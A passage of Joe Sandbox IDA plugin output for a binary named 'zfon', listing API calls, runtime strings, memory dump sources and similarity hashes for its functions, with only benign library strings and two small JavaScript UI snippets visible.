                                                                                                                                                                            • ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF79CFB457A,?,?,?,?,?,00007FF79CFB3EB6), ref: 00007FF79CFB4334
                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,00007FF79CFB457A,?,?,?,?,?,00007FF79CFB3EB6), ref: 00007FF79CFB43B4
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                            • String ID: string too long
                                                                                                                                                                            • API String ID: 237780522-2556327735
                                                                                                                                                                            • Opcode ID: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                                                                                            • Instruction ID: d427b6e85258f89c1b3a95447feb97649f4c1fe1c9a060c9c8e1bced142751de
                                                                                                                                                                            • Opcode Fuzzy Hash: 766234853e80b54a606be1abb6eea6c403c8145d92a10ec42f8acf46b96c6568
                                                                                                                                                                            • Instruction Fuzzy Hash: 5131AE22B18A4281DE249F2AE64402CA672FF48FD4BAC5531CE1D87B98DF2CE4919370
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Strftime_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID: !%x
                                                                                                                                                                            • API String ID: 1195835417-1893981228
                                                                                                                                                                            • Opcode ID: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                                                                                            • Instruction ID: 6c56d2ee3a70f69482aa0cd338f962d5f3a7cbf7361fd529d160442fc6096111
                                                                                                                                                                            • Opcode Fuzzy Hash: 475ce4feb2b53e6add6535e716405e09a01bdaf5ad8d93cb3019602a11087002
                                                                                                                                                                            • Instruction Fuzzy Hash: 19418CA6B08A819EFB10CFB5D4503ED2771AB5879CF409622EE5C27B8ADF38D145C760
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@memcpy
                                                                                                                                                                            • String ID: string too long
                                                                                                                                                                            • API String ID: 237780522-2556327735
                                                                                                                                                                            • Opcode ID: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                                                                                            • Instruction ID: 9c8e837f65833daf41a74fade25facacc051e47d6718503515740600096ab0ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 6cc9c3de7402aa3eda63dc3cfcc9be082f1e203825f314b7ca0c0bae42979206
                                                                                                                                                                            • Instruction Fuzzy Hash: E031A263F4CA4281EF249B2AE5401299232EB4CFD4F854133DE6E07BD9DF2CD4998350
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _errnoisspace
                                                                                                                                                                            • String ID: +
                                                                                                                                                                            • API String ID: 607103254-2126386893
                                                                                                                                                                            • Opcode ID: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
                                                                                                                                                                            • Instruction ID: 175ed11ffe9dc4809fce35ad441319b343894ccda69a1a6139e3ceaff31d0ae6
                                                                                                                                                                            • Opcode Fuzzy Hash: ceb648361af4a40464abd6bb96d21510e563132ef184305b88ba731e0678b504
                                                                                                                                                                            • Instruction Fuzzy Hash: EB2105A5B0864781FB249F39D85027E6BD1AB48FE0F995035DE4D93790EE3CD9638B00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: void$void
                                                                                                                                                                            • API String ID: 2943138195-3746155364
                                                                                                                                                                            • Opcode ID: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                                                                                            • Instruction ID: 1f252c6dde33f405a638691b2565b3b1ecb46b0ee0f7e8bf51d5288db470f05c
                                                                                                                                                                            • Opcode Fuzzy Hash: 97d3235dbf24bda01b6dbd3d7bde98b4578176fb3c7ca11f2c57902aac5691c6
                                                                                                                                                                            • Instruction Fuzzy Hash: 5B3139AAE18B5598FB00CFB4E8401FE37B0BB48748B551536EE4E62B59DF38A149CB50
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB2B8F
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFB2BDA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: text/html
                                                                                                                                                                            • API String ID: 3856544966-3872744991
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 3041573648-612978255
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Winerror_messagememcpymemmovememsetstd::_
                                                                                                                                                                            • String ID: unknown error
                                                                                                                                                                            • API String ID: 3480822978-3078798498
                                                                                                                                                                            APIs
                                                                                                                                                                            • ?_Xout_of_range@std@@YAXPEBD@Z.MSVCP140(?,?,?,00007FF79CFB307B), ref: 00007FF79CFB327D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xout_of_range@std@@
                                                                                                                                                                            • String ID: invalid string position
                                                                                                                                                                            • API String ID: 1960685668-1799206989
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEEC5
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEEFD
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}, xrefs: 00007FF79CFCEE6B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}
                                                                                                                                                                            • API String ID: 3856544966-1929393026
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2520: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEFB5
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFCEFED
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}, xrefs: 00007FF79CFCEF5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B65920: _lock_locales.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B6592F
                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00007FFBC1B3ACBC
                                                                                                                                                                            • _CxxThrowException.VCRUNTIME140 ref: 00007FFBC1B3ACCD
                                                                                                                                                                              • Part of subcall function 00007FFBC1B45E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DA0
                                                                                                                                                                              • Part of subcall function 00007FFBC1B45E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45DB2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B45E20: setlocale.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B45E3B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$ExceptionThrow_lock_localesstd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xlength_error@std@@
                                                                                                                                                                            • String ID: gfffffff$vector<T> too long
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xout_of_range@std@@memmove
                                                                                                                                                                            • String ID: invalid string position
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                            • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                            • String ID: csm
                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copyrand_s
                                                                                                                                                                            • String ID: invalid random_device value
                                                                                                                                                                            • API String ID: 979846984-3926945683
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrow__std_exception_copystd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: bad function call
                                                                                                                                                                            • API String ID: 1180758849-3612616537
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FFBC1B16E48: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFBC1B129EE), ref: 00007FFBC1B16E56
                                                                                                                                                                            • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B1F48A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abortterminate
                                                                                                                                                                            • String ID: csm$f
                                                                                                                                                                            • API String ID: 661698970-629598281
                                                                                                                                                                            APIs
                                                                                                                                                                            • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3D45D
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B739
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B768
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: memcpy.VCRUNTIME140(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B77F
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3D47A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FFBC1B3D485
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: free$Getmonthsmallocmemcpy
                                                                                                                                                                            • String ID: :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece
                                                                                                                                                                            • API String ID: 1628830074-2030377133
                                                                                                                                                                            APIs
                                                                                                                                                                            • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFBC1B3D40D
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B739
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B768
                                                                                                                                                                              • Part of subcall function 00007FFBC1B3B710: memcpy.VCRUNTIME140(?,?,00000000,00007FFBC1B4C445), ref: 00007FFBC1B3B77F
                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFBC1B3D42A
                                                                                                                                                                            Strings
                                                                                                                                                                            • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FFBC1B3D435
